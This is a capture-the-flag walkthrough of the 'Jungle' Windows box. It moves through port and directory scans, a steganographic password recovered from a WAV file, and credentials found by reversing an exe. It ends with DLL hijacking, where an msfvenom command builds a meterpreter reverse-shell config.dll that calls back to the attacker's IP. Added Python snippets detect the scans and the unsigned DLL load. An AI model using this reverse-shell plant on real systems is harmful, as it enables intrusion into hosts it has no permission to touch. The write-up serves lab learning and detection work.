Nmap
[root@Hacking] /home/kali/Jungle
❯ nmap 192.168.55.161 -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Welcome to the Jungle - The Hex Guns
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Dirsearch
[root@Hacking] /home/kali/Jungle
❯ feroxbuster -u http://192.168.55.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.161
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 160c http://192.168.55.161/img => http://192.168.55.161/img/
200 GET 29l 124w 1209c http://192.168.55.161/index.php
200 GET 42l 168w 1915c http://192.168.55.161/albums.php
301 GET 2l 10w 162c http://192.168.55.161/media => http://192.168.55.161/media/
200 GET 126l 218w 2089c http://192.168.55.161/css/styles.css
200 GET 7l 13w 189c http://192.168.55.161/header.php
200 GET 8487l 45658w 3909539c http://192.168.55.161/img/axl.png
200 GET 29l 124w 1209c http://192.168.55.161/
200 GET 3l 11w 81c http://192.168.55.161/footer.php
403 GET 29l 91w 1232c http://192.168.55.161/css/
301 GET 2l 10w 160c http://192.168.55.161/css => http://192.168.55.161/css/
200 GET 29l 124w 1209c http://192.168.55.161/Index.php
301 GET 2l 10w 162c http://192.168.55.161/Media => http://192.168.55.161/Media/
200 GET 7731l 46736w 3824296c http://192.168.55.161/img/digital-destruction.png
200 GET 9162l 55315w 4712528c http://192.168.55.161/img/paradise-404.png
200 GET 8321l 48830w 4266377c http://192.168.55.161/img/neon-rebellion.png
301 GET 2l 10w 160c http://192.168.55.161/IMG => http://192.168.55.161/IMG/
200 GET 7l 13w 189c http://192.168.55.161/Header.php
200 GET 29l 124w 1209c http://192.168.55.161/INDEX.php
301 GET 2l 10w 160c http://192.168.55.161/CSS => http://192.168.55.161/CSS/
301 GET 2l 10w 160c http://192.168.55.161/Img => http://192.168.55.161/Img/
200 GET 3l 11w 81c http://192.168.55.161/Footer.php
301 GET 2l 10w 162c http://192.168.55.161/MEDIA => http://192.168.55.161/MEDIA/
200 GET 7l 13w 189c http://192.168.55.161/HEADER.php
200 GET 3l 11w 81c http://192.168.55.161/FOOTER.php
[####################] - 5m 1984940/1984940 0s found:25 errors:0
[####################] - 5m 220546/220546 722/s http://192.168.55.161/
[####################] - 5m 220546/220546 721/s http://192.168.55.161/img/
[####################] - 5m 220546/220546 720/s http://192.168.55.161/media/
[####################] - 5m 220546/220546 721/s http://192.168.55.161/css/
[####################] - 5m 220546/220546 722/s http://192.168.55.161/Media/
[####################] - 5m 220546/220546 723/s http://192.168.55.161/IMG/
[####################] - 5m 220546/220546 728/s http://192.168.55.161/CSS/
[####################] - 5m 220546/220546 729/s http://192.168.55.161/Img/
[####################] - 5m 220546/220546 797/s http://192.168.55.161/MEDIA/
Scanning the /media directory reveals a zip archive.
[root@Hacking] /home/kali/Jungle
❯ feroxbuster -u http://192.168.55.161/media -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.161/media
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [zip]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 162c http://192.168.55.161/media => http://192.168.55.161/media/
200 GET 11l 74w 5642c http://192.168.55.161/media/songs.zip
200 GET 11l 74w 5642c http://192.168.55.161/media/Songs.zip
[####################] - 35s 220547/220547 0s found:3 errors:0
[####################] - 34s 220546/220546 6468/s http://192.168.55.161/media/
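From the defender's side, both scans above leave a distinctive trail in the IIS access log. The following added example (not part of the original write-up) parses a constructed W3C log excerpt and flags clients by the default feroxbuster User-Agent, a high share of 404 responses, and the same path requested in several casings. The field subset, thresholds and the two extra client addresses are assumptions.

```python
from collections import defaultdict

SCANNER_AGENTS = ("feroxbuster",)  # default User-Agent prefix, as in the banner above

# Constructed IIS W3C excerpt for illustration; not taken from the target's logs.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status
2025-01-01 10:00:00 GET /index.php 192.168.55.20 Mozilla/5.0 200
2025-01-01 10:01:00 GET /admin 192.168.55.4 feroxbuster/2.11.0 404
2025-01-01 10:01:00 GET /backup.php 192.168.55.4 feroxbuster/2.11.0 404
2025-01-01 10:01:00 GET /index.php 192.168.55.4 feroxbuster/2.11.0 200
2025-01-01 10:01:01 GET /Index.php 192.168.55.4 feroxbuster/2.11.0 200
2025-01-01 10:01:01 GET /INDEX.php 192.168.55.4 feroxbuster/2.11.0 200
2025-01-01 10:01:01 GET /test 192.168.55.4 feroxbuster/2.11.0 404
2025-01-01 10:02:00 GET /old 192.168.55.30 Mozilla/5.0 404
2025-01-01 10:02:00 GET /dev 192.168.55.30 Mozilla/5.0 404
2025-01-01 10:02:01 GET /img 192.168.55.30 Mozilla/5.0 301
"""

def parse_w3c(text):
    """Map each data line to a dict keyed by the names in the #Fields directive."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and len(line.split()) == len(fields):
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_scanners(rows, min_requests=3, min_404_ratio=0.5):
    """Return {client_ip: [reasons]} for clients that look like content discovery."""
    stats = defaultdict(lambda: {"n": 0, "nf": 0, "ua": set(), "paths": defaultdict(set)})
    for r in rows:
        s = stats[r["c-ip"]]
        s["n"] += 1
        s["nf"] += r["sc-status"] == "404"
        s["ua"].add(r["cs(User-Agent)"].lower())
        s["paths"][r["cs-uri-stem"].lower()].add(r["cs-uri-stem"])
    findings = {}
    for ip, s in stats.items():
        reasons = []
        if any(ua.startswith(SCANNER_AGENTS) for ua in s["ua"]):
            reasons.append("scanner-user-agent")
        if s["n"] >= min_requests and s["nf"] / s["n"] >= min_404_ratio:
            reasons.append("404-burst")
        if any(len(v) > 1 for v in s["paths"].values()):  # same path, several casings
            reasons.append("case-variant-paths")
        if reasons:
            findings[ip] = reasons
    return findings
```

The third client in the sample uses a browser-like User-Agent and is still flagged on behaviour, which is why the User-Agent match should never be the only signal.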
Stegseek
Extract the archive.
[root@Hacking] /home/kali/Jungle
❯ unzip songs.zip
Archive: songs.zip
inflating: digital_destruction.txt
inflating: neon_rebellion.txt
inflating: paradaise_404.txt
inflating: solo_final.wav
[root@Hacking] /home/kali/Jungle
❯ ls
digital_destruction.txt neon_rebellion.txt paradaise_404.txt solo_final.wav songs.zip
[root@Hacking] /home/kali/Jungle
❯ cat digital_destruction.txt
Binary burns through the wires,
1s and 0s flying higher...
# nothing special here
[root@Hacking] /home/kali/Jungle
❯ cat neon_rebellion.txt
Rise against the static tide,
firewalls can't stop our ride.
[root@Hacking] /home/kali/Jungle
❯ cat paradaise_404.txt
They tried to hide, but we still found,
The jungle echoes with a sound...
There's always one password we’ve used since the first rehearsal...
Here I fed the page source to ChatGPT to generate password combinations; the password turned out to be thehexguns.
[root@Hacking] /home/kali/Jungle
❯ stegseek solo_final.wav pass.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "thehexguns"
[i] Original filename: "password.txt".
[i] Extracting to "solo_final.wav.out".
[root@Hacking] /home/kali/Jungle
❯ cat solo_final.wav.out
Password:sweetjungle2025
URL:theh3xgun5
IDA
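This yields a password string and a URL, but the username is not admin.
The page source reveals that the username is slash.
After logging in at the URL, an exe file can be downloaded.
Load it into IDA and decompile it.
This reveals user credentials that allow remote login.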

DLL Hijack
In the HexGuns directory, config.dll turns out to be missing.
The decompilation of setlist_uploader.exe also shows that it requires config.dll.
So I generate a malicious DLL myself to get a reverse shell.
[root@Hacking] /home/kali/Jungle
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.55.4 LPORT=4444 -f dll -o config.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: config.dll
Upload it to the directory.
Then wait for it to be executed (or manually reboot the machine) to obtain a meterpreter session.
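To detect the DLL plant described above, the following added example (not part of the original write-up) triages Sysmon Event ID 7 (ImageLoad) records and flags a DLL without a valid signature that is loaded from the executable's own directory when that directory lies outside the protected system roots. The event XML is constructed, and the `C:\ExampleApps\HexGuns` path and all helper names are assumptions.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Roots that standard users normally cannot write to.
PROTECTED = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def make_event(image, loaded, signed, status):
    """Build a constructed Sysmon Event ID 7 (ImageLoad) record as event XML."""
    data = {"Image": image, "ImageLoaded": loaded, "Signed": signed, "SignatureStatus": status}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>7</EventID></System>'
            f"<EventData>{body}</EventData></Event>")

# Constructed sample; the HexGuns location below is a placeholder, not taken from the target.
APP = "C:\\ExampleApps\\HexGuns\\"
SAMPLE = [
    make_event(APP + "setlist_uploader.exe", APP + "config.dll", "false", "Unavailable"),
    make_event(APP + "setlist_uploader.exe", r"C:\Windows\System32\kernel32.dll", "true", "Valid"),
    make_event(r"C:\Program Files\Vendor\app.exe", r"C:\Program Files\Vendor\helper.dll",
               "false", "Unavailable"),
]

def parse_image_load(xml_text):
    """Return the EventData fields of an ImageLoad event, or None for other event IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "7":
        return None
    return {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}

def suspicious_loads(xml_events):
    """Flag untrusted DLLs loaded from the executable's own, unprotected directory."""
    hits = []
    for ev in filter(None, map(parse_image_load, xml_events)):
        exe_dir = ntpath.dirname(ev["Image"]).lower() + "\\"
        dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower() + "\\"
        trusted = ev["Signed"].lower() == "true" and ev["SignatureStatus"] == "Valid"
        if dll_dir == exe_dir and not dll_dir.startswith(PROTECTED) and not trusted:
            hits.append((ntpath.basename(ev["Image"]), ev["ImageLoaded"]))
    return hits
```

The underlying fix is on the host: the application directory should not be writable by the account used for remote login, which removes the opportunity to plant the missing DLL.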
